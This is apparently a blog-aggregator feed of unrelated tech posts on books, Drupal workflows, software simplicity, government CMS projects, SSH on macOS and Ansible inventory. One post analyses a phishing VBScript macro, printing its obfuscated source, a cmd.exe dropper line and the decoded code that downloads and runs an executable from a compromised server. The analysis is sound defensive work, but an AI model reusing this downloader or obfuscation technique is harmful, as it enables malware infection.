You can haz a video with Peter Watts reading a short excerpt from Echopraxia at the Canada Privacy Symposium. You can also get a feel from these books based on their quotes: Blindsight quotes, Echopraxia quotes. Or simply read Malek 🙂 Though Malek does not have OP space vampires that are seriously OP.

My favorite non-fiction book for the year is Thinking Fast and Slow, which is crammed full with information useful to anyone who wants to better understand how their (or others) mind works, where it tends to go off the rails, and what can be done about those cases. The number two slot goes to Domain-Driven Design Distilled, which unlike the red and blue books is actually somewhat readable.

My favorite short story was Crystal Nights by Greg Egan. It explores the creation of something akin to strong AI via simulated evolution, including various ethical and moral questions this raises. It does not start with a tetravalent graph more like diamond than graphite, but you can’t have everything now can you?

Dat Distribution

All books I read, except for 2 short stories, where published earliest in the year 2000.

Lying Lydia <3

Lydia after audiobook hax

For 2016 I set a reading goal of 21 books, to beat Lydia‘s 20. She ended up reading 44, so beat me. However, she used OP audio book hax. I attempted this as well but did not manage to catch up, even though I racked up 11.5 days worth of listening time. This year I will win of course. (Plan B)

Series, Seriously

As you might be able to deduce from the read in vs published in chart, I went through a number of series. I read all The Expanse novels after watching the first season of the television series based on them. Similarly I read the Old Man’s War novels except the last one, which I have not finished yet. Both series are fun, though they might not live up to the expectations of fellow Hard Science Fiction master race members, as they are geared more towards plain SF plebs. Finally I started with the Revelation Space books by Alastair Reynolds after reading House of Suns, which has been on my reading list since forever. This was also high time since clearly I need to have read all the books from authors that have been in a Google hangout with Special Circumstances agent Ian M. Banks.

Nine months ago I wrote about the importance of improving Drupal's content workflow capabilities and how we set out to include a common base layer of workflow-related functionality in Drupal 8 core. That base layer would act as the foundation on which we can build a list of great features like cross-site content staging, content branching, site previews, offline browsing and publishing, content recovery and audit logs. Some of these features are really impactful; 5 out of the top 10 most requested features for content authors are related to workflows (features 3-7 on the image below). We will deliver feature requests 3 and 4 as part of the "content workflow initiative" for Drupal 8. Feature requests 5, 6 and 7 are not in scope of the current content workflow initiative but still stand to benefit significantly from it. Today, I'd like to provide an update on the workflow initiative's progress the past 9 months.

The top 10 requested features for content creators according to the 2016 State of Drupal survey. Features 1 and 2 are part of the media initiative for Drupal 8. Features 3 and 4 are part of the content workflow initiative. Features 5, 6 and 7 benefit from the content workflow initiative.

Configurable content workflow states in Drupal 8.2

While Drupal 8.0 and 8.1 shipped with just two workflow states (Published and Unpublished), Drupal 8.2 (with the the experimental Content moderation module) ships with three: Published, Draft, and Archived. Rather than a single 'Unpublished' workflow state, content creators will be able to distinguish between posts to be published later (drafts) and posts that were published before (archived posts).

The 'Draft' workflow state is a long-requested usability improvement, but may seem like a small change. What is more exciting is that the list of workflow states is fully configurable: you can add additional workflow states, or replace them with completely different ones. The three workflow states in Drupal 8.2 are just what we decided to be good defaults.

Let's say you manage a website with content that requires legal sign-off before it can be published. You can now create a new workflow state 'Needs legal sign-off' that is only accessible to people in your organization's legal department. In other words, you can set up content workflows that are simple (like the default one with just three states) or that are very complex (for a large organization with complex content workflows and permissions).

This functionality was already available in Drupal 7 thanks to the contributed modules like the Workbench suite. Moving this functionality into core is useful for two reasons. First, it provides a much-requested feature out of the box – this capability meets the third most important feature request for content authors. Second, it encourages contributed modules to be built with configurable workflows in mind. Both should improve the end-user experience.

Support for different workflows in Drupal 8.3

Drupal 8.3 (still in development, planned to be released in April of 2017) goes one step further and introduces the concept of multiple types of workflows in the experimental Workflows module. This provides a more intuitive way to set up different workflows for different content types. For example, blog posts might not need legal sign-off but legal contracts do. To support this use case, you need to be able to setup different workflows assigned to their appropriate content types.

What is also interesting is that the workflow system in Drupal 8.3 can be applied to things other than traditional content. Let's say that our example site happens to be a website for a membership organization. The new workflow system could be the technical foundation to move members through different workflows (e.g. new member, paying member, honorary member). The reusability of Drupal's components has always been a unique strength and is what differentiates an application from a platform. By enabling people to reuse components in interesting ways, we turn Drupal into a powerful platform for building many different applications.

Drupal 8.3 will support multiple different editorial workflows. Each workflow can define its own workflow states as well as the possible transitions between them. Each transition has permissions associated with them to control who can move content from one state to another.

Workspace interactions under design

While workflows for individual content items is very powerful, many sites want to publish multiple content items at once as a group. This is reflected in the fourth-most requested feature for content authors, 'Staging of multiple content changes'. For example, a newspaper website might cover the passing of George Michael in a dedicated section on their site. Such a section could include multiple pages covering his professional career and personal life. These pages would have menus and blocks with links to other resources. 'Workspaces' group all these individual elements (pages, blocks and menus) into a logical package, so they can be prepared, previewed and published as a group. And what is great about the support for multiple different workflows is that content workflows can be applied to workspaces as well as to individual pieces of content.

We are still in the early stages of building out the workspace functionality. Work is being done to introduce the concept of workspaces in the developer API and on designing the user interface. A lot remains to be figured out and implemented, but we hope to introduce this feature in Drupal 8.5 (planned to be released in Q2 of 2018). In the mean time, other Drupal 8 solutions are available as contributed modules.

An outside-in design that shows how content creators could work in different workspaces. When you're building out a new section on your site, you want to preview your entire site, and publish all the changes at once. Designed by Jozef Toth at Pfizer.

Closing thoughts

We discussed work on content workflows and workspaces. The changes being made will also help with other problems like content recovery, cross-site content staging, content branching, site previews, offline browsing and publishing, and audit logs. Check out the larger roadmap of the workflow initiative and the current priorities. We have an exciting roadmap and are always looking for more individuals and organizations to get involved and accelerate our work. If you want to get involved, don't be afraid to raise your hand in the comments of this post.

Thank you

I tried to make a list of all people and organizations to thank for their work on the workflow initiative but couldn't. The Drupal 8 workflow initiative borrows heavily from years of hard work and learnings from many people and organizations. In addition, there are many people actively working on various aspects of the Drupal 8 workflow initiative. Special thanks to Dick Olsson (Pfizer), Jozef Toth (Pfizer), Tim Millwood (Appnovation), Andrei Jechiu (Pfizer), Andrei Mateescu (Pfizer), Alex Pott (Chapter Three), Dave Hall (Pfizer), Ken Rickard (Palantir.net) and Ani Gupta (Pfizer). Also thank you to Gábor Hojtsy (Acquia) for his contributions to this blog post.

January 05, 2017

January 03, 2017

During the holidays we have performed some interviews with main track speakers from various tracks. To get up to speed with the topics discussed in the main track talks, you can start reading the following interviews: Benjamin Kampmann: It's time to SAFE the Internet. Introducing SAFE, the decentralised privacy-first storage and communication network Dominik George and Eike Jesinghaus: The Veripeditus AR Game Framework. Enabling everyone to freely create Augmented Reality Games Ed Schouten: CloudABI: easily develop sandboxed apps for UNIX Martin Pitt: Continuous Integration at a Distribution Level. Shepherding 30.000 packages to never break Mathieu Stephan: The Making of a舰

January 02, 2017

Simplicity is possibly the single most important thing on the technical side of software development. It is crucial to keep development costs down and external quality high. This blog post is about why simplicity is not the same thing as easiness, and common misconceptions around these terms.

Simple is not easy

Simple is the opposite of complex. Both are a measure of complexity, which arises from intertwining things such as concepts and responsibilities. Complexity is objective, and certain aspects of it, such as Cyclomatic Complexity, can be measured with many code quality tools.

Easy is the opposite of hard. Both are a measure of effort, which unlike complexity, is subjective and highly dependent on the context. For instance, it can be quite hard to rename a method in a large codebase if you do not have a tool that allows doing so safely. Similarly, it can be quite hard to understand an OO project if you are not familiar with OO.

Achieving simplicity is hard

I’m sorry I wrote you such a long letter; I didn’t have time to write a short one.

Blaise Pascal

Finding simple solutions, or brief ways to express something clearly, is harder than finding something that works but is more complex. In other words, achieving simplicity is hard. This is unfortunate, since dealing with complexity is so hard.

Since in recent decades the cost of software maintenance has become much greater than the cost of its creation, it makes sense to make maintenance as easy as we can. This means avoiding as much complexity as we can during the creation of the software, which is a hard task. The cost of the complexity does not suddenly appear once the software goes into an official maintenance phase, it is there on day 2, when you need to deal with code from day 1.

Good design requires thought

Some people in the field conflate simple and easy in a particularly unfortunate manner. They reason that if you need to think a lot about how to create a design, it will be hard to understand the design. Clearly, thinking a lot about a design does not guarantee that it is good and minimizes complexity. You can do a good job and create something simple or you can overengineer. The one safe conclusion you can make based on the effort spent is that for most non-trivial problems, if little effort was spent (by going for the easy approach), the solution is going to be more complex than it could have been.

One high-profile case of such conflation can be found in the principles behind the Agile Manifesto. While I don’t fully agree with some of the other principles, this is the only one I strongly disagree with (unless you remove the middle part). Yay Software Craftsmanship manifesto.

Simplicity–the art of maximizing the amount of work not done–is essential

Principles behind the Agile Manifesto

Similarly we should be careful to not confuse the ease of understanding a system with the ease of understanding how or why it was created the way it was. The latter, while still easier than the actual task of creating a simple solution, is still going to be harder than working with said simple solution, especially for those that lack the skills used in its creation.

Again, I found a relatively high-profile example of such confusion:

If the implementation is hard to explain, it’s a bad idea. If the implementation is easy to explain, it may be a good idea.

The Zen of Python

I think this is just wrong.

You can throw all books in a library onto a big pile and then claim it’s easy to explain where a particular book is – in the pile – though actually finding the book is more of a challenge. It’s true that more skill is required to use the library effectively than going through a pile of books randomly. You need to know the alphabet and be familiar with genres of books. It is also true that sometimes it does not make sense to invest in the skill that allows working more effectively, and that sometimes you simply cannot find people with the desired skills. This is where the real bottleneck is: learning. Most of the time these investments are worth it, as they allow you to work both faster and better from that point on.

See also

In my reply to the Big Ball of Mud paper I also talk about how achieving simplicity requires effort.

The main source of inspiration that led me to this blog post is Rich Hickeys 2012 Rails Conf keynote, where he starts by differentiating simple and easy. If you don’t know who Rich Hickey is (he created Clojure), go watch all his talks on YouTube now, well worth the time. (I don’t agree with everything he says but it tends to be interesting regardless.) You can start with this keynote, which goes into more detail than this blog post and adds a bunch of extra goodies on top. <3 Rich

Following the reasoning in this blog post, you cannot trade software quality for lower cost. You can read more about this in the Tradable Quality Hypothesis and Design Stamina Hypothesis articles.

There is another blog post titled Simple is not easy, which as far as I can tell, differentiates the terms without regard to software development.

January 01, 2017

Yet, another exciting year, learning new skills and meeting new people, here are some highlights of 2016 :
  • visited FOSDEM; giving a lightning talk about Buildtime Trend; meeting Rouslan, Eduard, Ecaterina and many others
  • attended a Massive Attack concert in Paleis 12.
  • visited Mount Expo, the outdoor fair organised by KBF
  • saw some amazing outdoor films on the BANFF film festival
  • spent a weekend cleaning routes with the Belgian Rebolting Team (BRT) in Comblain-La-Tour. On Sunday we did some climbing in Les Awirs, where I finished a 6b after trying a few times.
  • First time donating blood plasma
  • First academic publication (as co-author) : https://biblio.ugent.be/publication/7204792
  • Climbing trip to Gorges du Tarn with Vertical Thinking : climbing 6 days out of 7 (one day of rain), doing multipitch Le Jardin Enchanté, sending a lot of 5, 6a and 6a+ routes, focusing on reading the route, looking for footholds and taking small steps.
  • Some more route cleaning with BRT, this time in Flône, removing loose rock and preparing to open new routes.
  • went to DebConf16 in CapeTown, talking about 365 days of Open Source (video) and made a first contribution to Debian.
  • Visited South Africa and climbed in Rocklands/Cederberg
  • became a (Junior Developer) member of the Debian MySQL Maintainers Team
  • 10th blood/plasma donation
  • visited Amsterdam for the MariaDB developers meetup
  • climbing trip to Orpierre in France. It was cold during the night, but as soon as the sun came out it was T-shirt weather. Plenty of climbing with Adriaan, Mathias, Bert, Stijn en Corentin (a local French climber) : a very nice multipitch (Diedre Sud, 7 5b/5c pitches) and quite a few 5's en 6's single pitch routes, with a few 6a's leading and 2 6b's toprope.
  • Another cleaning weekend with BRT, learning how to glue bolts. Slipped on a greasy forest trail and bruised a rib.
  • went to 33C3 in Hamburg : 4 days of talks about IT, technology, science, security and privacy.
  • celebrating New Year's Eve in Ghent with some friends, good food and an exciting quiz

Plans for 2017 :
  • Clean some rock with BRT, climb, both indoor and do a few climbing trips
  • Conferences : FOSDEM, DebConf, FrosCon, 34C3
  • Contribute to Debian and MariaDB

December 31, 2016

The post In 2017, I’m going to stop watching the news appeared first on ma.ttias.be.

I've stopped watching the news a few months ago and it's definitely a trend I'm planning to continue in 2017.

We live in a world of information. Open Facebook and you see dozens of articles about topics your friends are interested in. Open Twitter and you'll see yet another death of a celebrity. Open a news app and you'll read about plain crashes, terrorist threats, immigration, warzones and Syria.

Ask yourself a simple question though: what can you do about that?

Absolutely nothing.

Stop reading the news

A few months ago I removed all news apps from my phone, which was my primary source of mainstream news. Those are the kind of apps that want you to read every article by making headlines look as scary or unbelievable as possible.

But you really don't need an app to tell you that;

  • There are still refugees on the run from Syria and Libya
  • There are going to be terrorist attacks all over the world, taking hundreds of lives
  • Trump is going to be president in 2017
  • Some celebrity is going through some kind of scandal

You can fairly accurately predict what the news of next week is going to be. Or better yet: you can predict what news outlets are going to cover next week.

Be an ostridge ostrich

Bury your head in the sand.

Having nothing but bad news thrown at you every single day isn't going to make you happier if you can't do anything about it.

You know what makes you happier in life? Making things better, make someone else happy, do the things you love and care about.

I'd much rather read about local initiatives helping people, where my actions or donations can actually make a difference.

Sure, I can donate 50$ of tax-deductible money to the Red Cross to help them, but what's my 50$ going to do? It's not going to make a meaningful difference (1) and won't make me feel any better.

News about the things you care about

I love technology, innovation, gadgets, open source, Linux, ... and all things nerdy. Heck, I even devoted a weekly newsletter to it.

So to satisfy my hunger for information I'll still read Hacker News, the /r/linux and /r/programming subreddits and a handful of other websites.

But I choose what kind of news I want to see. And mainstream media isn't going to be on that list.

(1) I know what you're thinking: what if everyone stops donating? I'm not saying to stop donating, just focus on charities or help where your efforts make a meaningful difference. Not 0.000001% of the donations.

The post In 2017, I’m going to stop watching the news appeared first on ma.ttias.be.

December 30, 2016

Several people have commented on social media that last week's TAG Heuer post was a subtle (or not so subtle) gift request. In all honesty, it wasn't. That changes this week as I just learned that Lamborghini relaunched its website using Drupal 8. If anyone wants to gift a Lamborghini, don't hesitate to. Joking aside, it's great to see another famous brand use Drupal 8, including Drupal 8's new multi-lingual features. Check it out at https://www.lamborghini.com!

December 29, 2016

Commercial open-source software is usually based around some kind of asymmetry: the owner possesses something that you as a user do not, allowing them to make money off of it.

This asymmetry can take on a number of forms. One popular option is to have dual licensing: the product is open-source (usually GPL), but if you want to deviate from that, there’s the option to buy a commercial license. These projects are recognizable by the fact that they generally require you to sign a Contributor License Agreement (CLA) in which you transfer all your rights to the code over to the project owners. A very bad deal for you as a contributor (you work but get nothing in return) so I recommend against participating in those projects. But that’s a subject for a different day.

Another option for making asymmetry is open core: make a limited version open-source and sell a full-featured version. Typically named “the enterprise version”. Where you draw the line between both versions determines how useful the project is in its open-source form versus how much potential there is to sell it. Most of the time this tends towards a completely useless open-source version, but there are exceptions (e.g. Gitlab).

These models are so prevalent that I was pleasantly surprised to see who Sentry does things: as little asymmetry as possible. The entire product is open-source and under a very liberal license. The hosted version (the SaaS product that they sell) is claimed to be running using exactly the same source code. The created value, for which you’ll want to pay, is in the belief that a) you don’t want to spend time running it yourself and b) they’ll do a better job at it than you do.

This model certainly won’t work in all contexts and it probably won’t lead to a billion dollar exit, but that doesn’t always have to be the goal.

So kudos to Sentry, they’re certainly trying to make money in the nicest way possible, without giving contributors and hobbyists a bad deal. I hope they do well.

More info on their open-source model can be read on their blog: Building an Open Source Service.


Comments | More on rocketeer.be | @rubenv on Twitter

In this era of Open Government, constituents expect to be offered great services online. This can require moving an entire government to a new digital platform in order to deliver ambitious digital experiences that support the needs of citizens. It takes work, but many governments from the United States to Australia have demonstrated that with the right technology and strategy in place, governments can successfully adopt a new platform. Unfortunately this is not always the case.

How not to do it: Canada.ca

In 2014, the Government of Canada began a project to move all of its web pages onto a single site, Canada.ca. A $1.54 million contract for a content management system was awarded to a proprietary vendor in 2015. Fast forward to today, and the project is a year behind schedule and 10x over budget. The contract is now approaching $10 million. As only 0.05% of the migration to Canada.ca has been completed, many consider the current project to be disservice to its citizens.

I find the impending outcomes of this project to be disheartening as current timelines suggest that the migration will continue to be delayed, run over budget, and strain taxpayers. While I hope that Canada.ca will develop into a valuable resource for its citizens, I agree with Tom Cochran, Acquia's Chief Digital Strategist for Public Sector -- who ran digital platforms at the White House and U.S. Department of State -- that the prospects for Canada.ca are dim given the way the project was designed and is being implemented.

The root of Canada.ca's problem appears to be the decision to migrate 1,500 departments and 17 million pages into a single site. I'm guessing that the goal of having a single site is to offer citizens a central entry point to connect with their government. A single site strategy can be extremely effective, for example the City of Boston's single site is home to over 200,000 web page spanning 120 city departments, and offers a truly user-centric experience. With 17 million pages to migrate, Canada.ca is eighty-five times bigger than Boston.gov. A project of this magnitude should have considered using a multi-site approach where different agencies and departments have their own sites, but can use a common platform, toolset and shared infrastructure.

While difficulties with Canada.ca may have started with the ambitious attempt to move every department to a single domain, the complexities of this strategy are likely amplified through the implementation of a single-source proprietary solution. I find it unfortunate that Canada's procurement models did not favor Open Source. The Canadian government has a tenured history of utilizing Open Source, and there is a lot of existing Drupal talent in the country. In rejecting an open platform, the Canadian Government lost the opportunity to engage a skilled community of native, Open Source developers.

How to do it: Australian Government

Transforming an entire nation's digital strategy is challenging, but other public sector leaders have proven it is possible. Take the Australian Government. In 2015, John Sheridan, Sharyn Clarkson and their team in the Department of Finance moved their department's site from a legacy environment to Drupal and the cloud. The Department of Finance's success has grown into the Drupal distribution govCMS, which is currently supporting over 52 government agencies across 6 jurisdictions in Australia. Much like Canada.ca, the goal of govCMS is to provide citizens with a more intuitive platform to engage with their government.

The guiding principle of govCMS is to govern but to not seek control. Each government department requires flexibility to service the needs of their particular audiences. While single-site solutions do work as umbrellas for some organizations, the City of Boston being a great example, most large (government) organizations that have a state-of-the-art approach follow a hub and spoke model where different sites share code, templates and infrastructure. While sharing is strongly encouraged it is not required. This allows each department to independently innovate and adopt the platform how they choose.

The Open Source nature of govCMS has encouraged both innovation and collaboration across many Australian departments. One of the most remarkable examples of this is that a federal agency and a state agency coordinated their development efforts to build a data visualization capability on an open data CKAN repository. The Department of Environment initiated the development of the CKAN module necessary to pull and analyze data from a variety of departments. The Victorian Department of Premier and Cabinet recognized that they too could utilize the module to propel their budget report and aided in the co-development of the govCMS CKAN. This is an incredible example of how Open Source allows agencies to extend functionality across departments, regardless of vendor involvement. By setting up a model which removed the barriers to share, govCMS has provided Australia the freedom to truly innovate.

Seeing is believing: shifting the prevailing mindset

A distributed model using multiple sites to leverage an Open Source platform where infrastructure, code and templates are shared allows for governance and innovation to co-exist. I've written about this model here in a post about Loosening control the Open Source Way. I believe that a multi-site approach based on Open Source is the only way to move an entire government to a new digital strategy and platform.

It can be incredibly hard for organizations to understand this. After all, this is not about product features, technical capabilities or commercial support, but about a completely different way of working and innovating. It's a hard sell because we have to change the lens through which organizations see the world; away from procuring proprietary software that provides perceived safety and control, to a world that allows frictionless innovation and sharing through the loosening of control without losing control. For us to successfully market and sell the innovation that comes out of Drupal, Open Source and cloud, we have to shift how people think and challenge the prevailing model.

In many ways, organizations have to see it to believe it. What is exciting about the Australian government is that it helps others see the potential of a decentralized service model predicated on Open Source software with a Drupal distribution at its heart. The Australian government has created an ecosystem of frictionless sharing that is cheaper, faster, and enables better results.

What is next for Canada?

It’s difficult for me to see a light at the end of the tunnel for Canadian citizens. While the Canadian government can stay the course -– and all indications so far are that they will -- that path has a high price tag, long delays and slow innovation. An alternative would be for Ottawa to hit the pause button and reassess their strategy. They could look externally to how governments in Washington, Canberra, and countless others approached their mission to support the digital needs of its citizens. I know that there are countless Drupal experts working both within the government and at dozens of Drupal agencies throughout Canada that are eager to show their government a better way forward.

December 28, 2016

The post Mac OSX keeps prompting SSH key passphrase, does not use KeyChain appeared first on ma.ttias.be.

A minor annoyance after my Mac decided to auto-update to OSX 10.12.2: every time I wanted to SSH to a server, it kept prompting for my SSH key passphrase.

$ ssh ma.ttias.be
Enter passphrase for key '/Users/mattias/.ssh/id_rsa':

It used to save that info in Keychain, that got unlocked whenever I unlocked the Mac.

There's a quick workaround offered by Aral that seems to work fine for me.

$ cat ~/.ssh/config
Host *
  UseKeychain yes

Add that UseKeychain yes line to your ~/.ssh/config line and it forces the SSH daemon to use Keychain.

The reason is that the latest updates comes bundled with an updated OpenSSH package that changes some default behaviour.

Prior to macOS Sierra, ssh would present a dialog asking for your passphrase and would offer the option to store it into the keychain. This UI was deprecated some time ago and has been removed.

Instead, a new UseKeychain option was introduced in macOS Sierra allowing users to specify whether they would like for the passphrase to be stored in the keychain. This option was enabled by default on macOS Sierra, which caused all passphrases to be stored in the keychain.

This was not the intended default behavior, so this has been changed in macOS 10.12.2.
OpenSSH updates in macOS 10.12.2

That solved it for me.

The post Mac OSX keeps prompting SSH key passphrase, does not use KeyChain appeared first on ma.ttias.be.

You may have noticed (but you probably did not), but on 2017-02-04, at 14:00, in room UB2.252A (aka "Lameere"), which at that point in time will be the Virtualisation and IaaS devroom, I'll be giving a talk on the Network Block Device protocol.

Having been involved in maintaining NBD in one way or another for over fifteen years now, I've never seen as much activity around the concept as I have in the past few years. The result of that has been that we've added a number of new features to the protocol, to allow it to be used in settings where it was not as useful or as attractive as it would have been before. As a result, these are exciting times for those who care about NBD, and I thought it would be about time that I'd speak about it somewhere. The Virtualisation/IaaS devroom seemed like the right fit today (even though I wouldn't have thought so a mere two years ago), and so I'm happy they agreed to have me.

While I still have to start writing my slides, and therefore don't really know (yet) exactly what I'll be talking about, the schedule already contains an outline.

See you there?

December 24, 2016

It certainly isn’t the desktop. But nonetheless, it’s all over the place.

December 23, 2016

Yes, what was I thinking...

* 20160915: ordered dsl line at dommel.be. They already had all my contact data and other permissions, so that administrative bit went quickly. It would turn out to be the only quick and easy bit... I tell them five times that this will be a new line that needs to be dug in because whatever there migh have been has disappeared during renovations.
* 201610??: First proximus technician visit. He returns home "There's no line here. My data says there was a line here."
* 201610??: 
* 20161021: an ->A<-DSL line gets delivered instead of VDSL. It seems something went wrong during the order process (possibly on my side?).
* 20161021: I agree to pay a 25€ "reduced" upgrade fee and immediately order an upgrade to VDSL.
* Nothing happens for two weeks...
* Nothin happens for three weeks...
* /me calls Dommel. Dommel: "You will have to wait until your payment for the upgrade has been processed." "But... you have direct debit permissions on my account since two years now?" "Yes, but our administrative system doesn't allow that..."
* The payment eventually clears. /me calls them. "Yes, this week or the next, we will be able to make an appointment with a technician..."
* Another three weeks pass. No news. I call them. "In two or three weeks, we will be able to make an appointment with a technician"
* A few days later, Dommel informs me a proximus technican will visit on December 22...
* 20161222: Another proximus technician visits and connects the VDSL2 line.
* 20161222: I triple check with Dommel by phone if everything will be fine, and what I should do. "Didn't you receive a USB stick with configuration in it?" "No?" "Oh!" "So what to do now?" "We'll send you the required settings by email..."
* 20161223: Back home, I immediately test the settings. DSL line syncs (70/20), but PPPoE times out... Phone call to the Dommel help line. "Wait for an hour or so, things will be fine..." Four more phone calls that afternoon later... Proximus technician scheduled to drop by between 8am and noon...20161227. Not sure what he or she will be able to do. Let's hope for the best..

Growing up my dad had a watch from TAG Heuer. As a young child, I always admired his watch and wished that one day I'd have one as well. I still don't have a TAG Heuer watch, however I just found out that TAG Heuer relaunched its website using Drupal 8 and that is pretty cool too.

TAG Heuer's new website integrates Drupal 8 with their existing Magento commerce platform to provide a better, more content-rich shopping experience. It is a nice example of the "Content for Commerce"-opportunity that I wrote about a month ago. Check it out at https://www.tagheuer.com!

A quick blog post about a malicious VBScript macro that I analysed… Bad guys have always plenty of ideas to obfuscate their code. The macro was delivered via a classic phishing email with an attached zip archive that contained a Windows .lnk file. The link containing a simple call to cmd.exe with by very long “echo” line to write a VBScript file on the local disk and to execute it:

cmd.exe /c echo DATA >file.txt&&wscript //E:VBScript file.txt!%SystemRoot%\system32\SHELL32.DLL

The “DATA” dumped to file.txt have been beautified to be easily readable:

Set ak=GetObject("winmgmts:\\.\root\cimv2")
Set Kj0=ak.ExecQuery("Select * from Win32_DesktopMonitor",,48)
For Each Kj1 in Kj0
    Kj2=Kj1.ScreenWidth
    Kj3=Kj1.ScreenHeight
    Next
Kj5="hojiupO>mmfiTkcp!ufT;*##fyf/v##)dfyF/mmfiTkcp>dfyFkcp!ufT;*##mmfiT/uqjsdTX##)udfkcPfubfsD>mmfiTkcp!ufT;hojiupO>Jd!uft;hojiupO>gG!uft;hojiupO>7z!uft;uyfo;***2-MN-zepcftopqtfs/gG)cejn)cdtb)sid!fujsx/Jd;*zepcftopqtfs/gG)cofm!pu!2>MN!spg;eoft/gG;ftmbg-##fyf/g0tfmuju0ht/npd/zufjdptihji00;quui##-##UFH##!ofqp/gG;*##fyf/v##)fmjguyfufubfsd/7z>Jd!uft;*##2/6/utfvrfsquuiojx/quuiojx##)udfkcpfubfsd>gG!uft;*##udfkcpnfutztfmjg/hojuqjsdt##)udfkcpfubfsd>7z!uft"
execute(Replace(Kj4(Kj5,CStr(int(CInt((Kj2))/CInt((Kj3))))),chr(34)+chr(34),chr(34)))
Function Kj4(SP,IV)
    Dim s2,Op,Vz,d4,BQ:BQ=""
    s2=Len(IV)
    Op=1
    Vz=Len(SP)
    SP=StrReverse(SP)
    For d4=Vz To 1 Step -1
        BQ=BQ+chr(asc(Mid(SP,d4,1))-Asc(Mid(IV,Op,1))+48)
        Op=Op+1
        If Op Then Op=1 End If
        Next
    BQ=StrReverse(BQ)
    Kj4=BQ
End Function

As you can see, the variable Kj5 seems to be the most interesting and contains the obfuscated code. The script starts by connecting to WMI objects on the local computer (represented by the “.”):

Set ak=GetObject("winmgmts:\\.\root\cimv2")

Then it grabs the screen resolution from the Win32_DesktopMonitor object:

Set Kj0=ak.ExecQuery("Select * from Win32_DesktopMonitor",,48)
For Each Kj1 in Kj0
    Kj2=Kj1.ScreenWidth
    Kj3=Kj1.ScreenHeight
    Next

This technique could be used as a sandbox detection (many sandboxes have a low resolution by default) but it’s not the case this time. The width and height are converted to integers and the first divided by the second which returns always “1”. You should have an uncommon resolution where height > width or an ultra-wide monitor to get other results. This value “1” is passed to the function Kj4() which deobfuscates the long string. The function reverses the string and processes characters one by one starting by the end (character value – 49 + 48 – which shifts all characters by one: ‘h’ becomes ‘g’, ‘o’ becomes ‘n’, etc. Finally, the string is reversed again and is ready to be executed:

set y6=createobject("scripting.filesystemobject")
set Ff=createobject("winhttp.winhttprequest.5.1")
set cI=y6.createtextfile("u.exe")
Ff.open "GET","hxxp://highsociety.com.sg/titles/f.exe",false
Ff.send
for ML=1 to lenb(Ff.responsebody)
    cI.write chr(ascb(midb(Ff.responsebody,ML,1)))
    next
set y6=Nothing
set Ff=Nothing
set cI=Nothing
Set objShell=CreateObject("WScript.Shell")
Set objExec=objShell.Exec("u.exe")
Set objShell=Nothing

A classic HTTP connection is performed to drop the payload from a compromised server. Note that the macro did not work in my Windows 10 sandbox (empty values are returned instead of the screen width/height) but it worked with Windows 7.

 

[The post Using Monitor Resolution as Obfuscation Technique has been first published on /dev/random]

December 22, 2016

While still working on a few other projects, one of the time consumers of the past half year (haven't you noticed? my blog was quite silent) has come to an end: the SELinux System Administration - Second Edition book is now available. With almost double the amount of pages and a serious update of the content, the book can now be bought either through Packt Publishing itself, or the various online bookstores such as Amazon.

With the holidays now approaching, I hope to be able to execute a few tasks within the Gentoo community (and of the Gentoo Foundation) and get back on track. Luckily, my absence was not jeopardizing the state of SELinux in Gentoo thanks to the efforts of Jason Zaman.

December 21, 2016

December 20, 2016

[update] next post in this series: Ansible Inventory 2.0 design rules

In a my previous post “Current state of the Ansible inventory and how it might evolve” I explained some parts of the Ansible Inventory internals, and pointed out some features I would like to improve.

Whilst this exercise might be interesting to Ansible and specifically its internal inventory, it might also just be an idea for an external application that yields a flattened inventory (though an inventory plugin/ dynamic script), or it might be interesting to see if other configuration management tools might make use of it, as some sort of central or “single source of truth”.

Whereas currently the inventory has simple groups, that hold child groups, has parent groups, and can contain hosts, I believe a more rigid structure with more meta information would be beneficial. Not only to manage group trees, but also to manage variables assigned and defined in those groups, and managing the values throughout the parent child inheritance.

Next up some design ideas I have been playing with. A big part of this, is that, to me, managing inventory is much more about managing variable sets and their values, not just grouping hosts.

  1. inventory starts top level with a special root group. A bit like the all group we currently have. The root group is the only one that has 0 parents, and has one or more normal child groups. These child groups are the root groups for a subtree;
  2. a subtree holds sets of variables. ideally, a particular variable only lives in one single subtree;
  3. a normal group has 1 parent, and one ore more child groups;
  4. a merge group is a special group that can have more than one parent groups, but each parent must be member of a different subtree;
    • a merge group would typically merge sets of variables from different subtrees;
    • ideally a var does not exist in different parent trees, as to not have to deal with arbitrary precedence;
    • but maybe such a var holds e.g. a virtual host, and should at merge time become a list of virtual hosts, to be deployed on an apache instance;
    • care should be taken when a particular variable exists in different trees ;
  5. a merge group could also be cluster or instance group, or have such groups as a child, which means it has no child groups, but holds only hosts;
    • merge groups could also be dynamic: a child of postgres group and child of testing group would yield a postgres-test group
    • those groups need to track which subtrees they have in their ancestors
    • instead of tracking subtrees, perhaps track variable sets (and have a rule where a var can only exist in one set)
  6. a cluster group could keep track of which hosts in its group is a master (e.g. its’s a mysql master-slave cluster); such a property is of course dynamic; this would help to write playbooks that only have to run once per cluster, and on the master;
  7. a host can be member of different merge or cluster groups, e.g. when that hosts holds multiple roles. e.g. as a single LAMP stack, it runs mysql (with different databases) and apache (with different virtual hosts)
    • inheriting from multiple groups that are member of the same subtree, means something like having multiple instances of an applications, or virtual hosting applied on a host
    • this might be where the description for an application gets translated to what is needed to configure that application on one or more hosts
    • multiple app instances, can be bundled on a host, and more of them can be spread on multiple hosts
    • a single variable might needed to become a list on a specific instance
  8. merging groups is actually about merging the variables the hold
  9. a variable set is (meta) defined in a subtree; some vars might have a default, and some vars need to be updated when that default changes (perhaps a new dns server in your DC), whilst other may not be updated (the Java version your application was deployed with);
  10. at some point I tinkered on the idea of location groups/trees, which might be a thing more separate from classic organisational and application focused groups, to manage things like geographic location datacenter etc. but I’m not sure this still warrants a special kind of groups;
    • a geographical group membership could perhaps change the domain name of an url

But the point of all this is primarily to manage variables in the inventory. To be able to parametrize an application, to describe that application in perhaps a more high level way. Inventory should then allow you to transpose those values in a way that they easily apply to the host based execution level (the playbooks, and roles). This also includes a way to Puppet style “export” resources to other hosts.

Roles can be written and used in two ways, when deploying multiple instances of an application: (1) a role defines a basic application, and is called multiple times, perhaps as a parameterized role (but role: with_items: might be needed and that is not possible currently in Ansible); and (2) the role itself loops over a list of instances, where inventory translates membership of multiple apache virtualhosts instances to a list of virtual hosts per Ansible host.

